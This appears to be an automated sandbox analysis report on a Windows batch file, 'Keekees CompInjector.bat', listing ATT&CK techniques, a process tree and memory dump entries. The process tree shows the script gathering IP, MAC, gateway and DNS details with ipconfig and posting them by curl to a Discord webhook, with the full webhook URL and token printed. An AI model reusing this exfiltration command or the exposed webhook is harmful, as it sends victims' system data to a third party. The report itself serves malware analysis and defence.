5f5f61d9471e9ae04d78c3434fb619bd705e202b7fa5e6a631715c9e8ee35836

Analysis

max time kernel
58s
max time network
72s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
05/08/2023, 10:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Keekees CompInjector.bat
Size

3KB
MD5

8533f2a47061e239a189ede3cdb37f32
SHA1

451b861ab0410fc27d899a5fd8489855981c6b65
SHA256

5f5f61d9471e9ae04d78c3434fb619bd705e202b7fa5e6a631715c9e8ee35836
SHA512

fc84b97882256b4f9c4894ec7ce0db85c25b490017acb89dfce9b6347ac4d7793ffa3ecfb3c1de22e92982987d1d06f656d355c35ec437c56a027e5408c26db0

Score

6^/10

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Gathers network information 2 TTPs 9 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
492	ipconfig.exe
1044	ipconfig.exe
4408	ipconfig.exe
4140	ipconfig.exe
4592	ipconfig.exe
1716	ipconfig.exe
1184	ipconfig.exe
416	ipconfig.exe
1724	ipconfig.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
460	PING.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2592 wrote to memory of 2484	2592	cmd.exe	93
PID 2592 wrote to memory of 2484	2592	cmd.exe	93
PID 2484 wrote to memory of 460	2484	cmd.exe	94
PID 2484 wrote to memory of 460	2484	cmd.exe	94
PID 2484 wrote to memory of 4516	2484	cmd.exe	95
PID 2484 wrote to memory of 4516	2484	cmd.exe	95
PID 2592 wrote to memory of 4420	2592	cmd.exe	96
PID 2592 wrote to memory of 4420	2592	cmd.exe	96
PID 4420 wrote to memory of 492	4420	cmd.exe	97
PID 4420 wrote to memory of 492	4420	cmd.exe	97
PID 4420 wrote to memory of 3256	4420	cmd.exe	98
PID 4420 wrote to memory of 3256	4420	cmd.exe	98
PID 2592 wrote to memory of 3292	2592	cmd.exe	99
PID 2592 wrote to memory of 3292	2592	cmd.exe	99
PID 3292 wrote to memory of 1044	3292	cmd.exe	100
PID 3292 wrote to memory of 1044	3292	cmd.exe	100
PID 3292 wrote to memory of 1648	3292	cmd.exe	101
PID 3292 wrote to memory of 1648	3292	cmd.exe	101
PID 2592 wrote to memory of 2624	2592	cmd.exe	102
PID 2592 wrote to memory of 2624	2592	cmd.exe	102
PID 2624 wrote to memory of 4408	2624	cmd.exe	103
PID 2624 wrote to memory of 4408	2624	cmd.exe	103
PID 2624 wrote to memory of 2300	2624	cmd.exe	104
PID 2624 wrote to memory of 2300	2624	cmd.exe	104
PID 2592 wrote to memory of 732	2592	cmd.exe	105
PID 2592 wrote to memory of 732	2592	cmd.exe	105
PID 732 wrote to memory of 4140	732	cmd.exe	106
PID 732 wrote to memory of 4140	732	cmd.exe	106
PID 732 wrote to memory of 3680	732	cmd.exe	107
PID 732 wrote to memory of 3680	732	cmd.exe	107
PID 2592 wrote to memory of 2148	2592	cmd.exe	108
PID 2592 wrote to memory of 2148	2592	cmd.exe	108
PID 2148 wrote to memory of 4592	2148	cmd.exe	109
PID 2148 wrote to memory of 4592	2148	cmd.exe	109
PID 2148 wrote to memory of 4860	2148	cmd.exe	110
PID 2148 wrote to memory of 4860	2148	cmd.exe	110
PID 2592 wrote to memory of 1028	2592	cmd.exe	111
PID 2592 wrote to memory of 1028	2592	cmd.exe	111
PID 1028 wrote to memory of 1184	1028	cmd.exe	112
PID 1028 wrote to memory of 1184	1028	cmd.exe	112
PID 1028 wrote to memory of 440	1028	cmd.exe	113
PID 1028 wrote to memory of 440	1028	cmd.exe	113
PID 2592 wrote to memory of 4644	2592	cmd.exe	114
PID 2592 wrote to memory of 4644	2592	cmd.exe	114
PID 4644 wrote to memory of 416	4644	cmd.exe	115
PID 4644 wrote to memory of 416	4644	cmd.exe	115
PID 4644 wrote to memory of 4624	4644	cmd.exe	116
PID 4644 wrote to memory of 4624	4644	cmd.exe	116
PID 2592 wrote to memory of 2896	2592	cmd.exe	117
PID 2592 wrote to memory of 2896	2592	cmd.exe	117
PID 2896 wrote to memory of 1716	2896	cmd.exe	118
PID 2896 wrote to memory of 1716	2896	cmd.exe	118
PID 2896 wrote to memory of 3132	2896	cmd.exe	119
PID 2896 wrote to memory of 3132	2896	cmd.exe	119
PID 2592 wrote to memory of 4008	2592	cmd.exe	120
PID 2592 wrote to memory of 4008	2592	cmd.exe	120
PID 4008 wrote to memory of 1724	4008	cmd.exe	121
PID 4008 wrote to memory of 1724	4008	cmd.exe	121
PID 4008 wrote to memory of 4828	4008	cmd.exe	122
PID 4008 wrote to memory of 4828	4008	cmd.exe	122
PID 2592 wrote to memory of 1076	2592	cmd.exe	123
PID 2592 wrote to memory of 1076	2592	cmd.exe	123
PID 2592 wrote to memory of 2648	2592	cmd.exe	124
PID 2592 wrote to memory of 2648	2592	cmd.exe	124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Keekees CompInjector.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ping -4 -n 1 google.com | findstr "["
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Windows\system32\PING.EXE
    ping -4 -n 1 google.com
    3⤵
    - Runs ping.exe
    PID:460
- - C:\Windows\system32\findstr.exe
    findstr "["
    3⤵
    PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr /c:"IPv4 Address"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:492
- - C:\Windows\system32\findstr.exe
    findstr /c:"IPv4 Address"
    3⤵
    PID:3256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr /c:"IPv6 Address"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:1044
- - C:\Windows\system32\findstr.exe
    findstr /c:"IPv6 Address"
    3⤵
    PID:1648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr /c:"Physical Address"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2624
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:4408
- - C:\Windows\system32\findstr.exe
    findstr /c:"Physical Address"
    3⤵
    PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr /c:"Default Gateway"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:732
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:4140
- - C:\Windows\system32\findstr.exe
    findstr /c:"Default Gateway"
    3⤵
    PID:3680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr /c:"Temporary IPv6 Address"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:4592
- - C:\Windows\system32\findstr.exe
    findstr /c:"Temporary IPv6 Address"
    3⤵
    PID:4860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr /c:"Subnet Mask"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1028
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:1184
- - C:\Windows\system32\findstr.exe
    findstr /c:"Subnet Mask"
    3⤵
    PID:440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig /all | findstr /c:"DNS Servers"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4644
- - C:\Windows\system32\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:416
- - C:\Windows\system32\findstr.exe
    findstr /c:"DNS Servers"
    3⤵
    PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig /all | findstr /c:"DHCP Enabled"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\system32\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:1716
- - C:\Windows\system32\findstr.exe
    findstr /c:"DHCP Enabled"
    3⤵
    PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr /c:"Ethernet adapter"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4008
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:1724
- - C:\Windows\system32\findstr.exe
    findstr /c:"Ethernet adapter"
    3⤵
    PID:4828
- C:\Windows\system32\curl.exe
  curl -H "Content-Type: application/json" -X POST -d "{\"content\":\"Discord Username: i came in my sock\\nIPv4: 10.127.0.13\\nIPv6: fe80\\nComputer Name: MSXGLQPS\\nMAC Address: ~1\\nDefault Gateway: 10.127.0.1\\nTemporary IPv6: ~1\\nSubnet Mask: 255.255.0.0\\nDNS Servers: 8.8.8.8\\nDHCP Enabled: No\\nAdapter Name: ~1\"}" https://discord.com/api/webhooks/1137291125191872632/3x9fxMe7XgxvGNWaI_A7uZdCDqMseA6jdjFACu-AJjIQp4rVAuPA5DNgJ0riHLoxP_VH
  2⤵
  PID:1076
- C:\Windows\system32\msg.exe
  msg * "Information copied: output.txt"
  2⤵
  PID:2648
- C:\Windows\system32\msg.exe
  msg * "Information copied: output.txt"
  2⤵
  PID:2900
- C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
  2⤵
  PID:4220
- C:\Windows\system32\mspaint.exe
  mspaint
  2⤵
  PID:2160
- C:\Windows\system32\notepad.exe
  notepad
  2⤵
  PID:4384
- C:\Windows\system32\write.exe
  write
  2⤵
  PID:4308
- - C:\Program Files\Windows NT\Accessories\wordpad.exe
    "C:\Program Files\Windows NT\Accessories\wordpad.exe"
    3⤵
    PID:2200
- C:\Windows\system32\cmd.exe
  cmd
  2⤵
  PID:2740
- C:\Windows\explorer.exe
  explorer
  2⤵
  PID:3188
- C:\Windows\system32\control.exe
  control
  2⤵
  PID:336
- C:\Windows\system32\calc.exe
  calc
  2⤵
  PID:4412
- C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
  2⤵
  PID:4212
- C:\Windows\system32\mspaint.exe
  mspaint
  2⤵
  PID:4996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:2128

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
1⤵
PID:4696

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4220-146-0x00007FF8358B0000-0x00007FF8358C0000-memory.dmp

Filesize
64KB

Download
memory/4220-147-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-148-0x00007FF8358B0000-0x00007FF8358C0000-memory.dmp

Filesize
64KB

Download
memory/4220-149-0x00007FF8358B0000-0x00007FF8358C0000-memory.dmp

Filesize
64KB

Download
memory/4220-151-0x00007FF8358B0000-0x00007FF8358C0000-memory.dmp

Filesize
64KB

Download
memory/4220-150-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-152-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-154-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-153-0x00007FF8358B0000-0x00007FF8358C0000-memory.dmp

Filesize
64KB

Download
memory/4220-155-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-156-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-157-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-158-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-159-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-160-0x00007FF8335F0000-0x00007FF833600000-memory.dmp

Filesize
64KB

Download
memory/4220-161-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-162-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-163-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-164-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-165-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-167-0x00007FF8335F0000-0x00007FF833600000-memory.dmp

Filesize
64KB

Download
memory/4220-168-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-166-0x00007FF875830000-0x00007FF875A25000-memory.dmp

Filesize
2.0MB

Download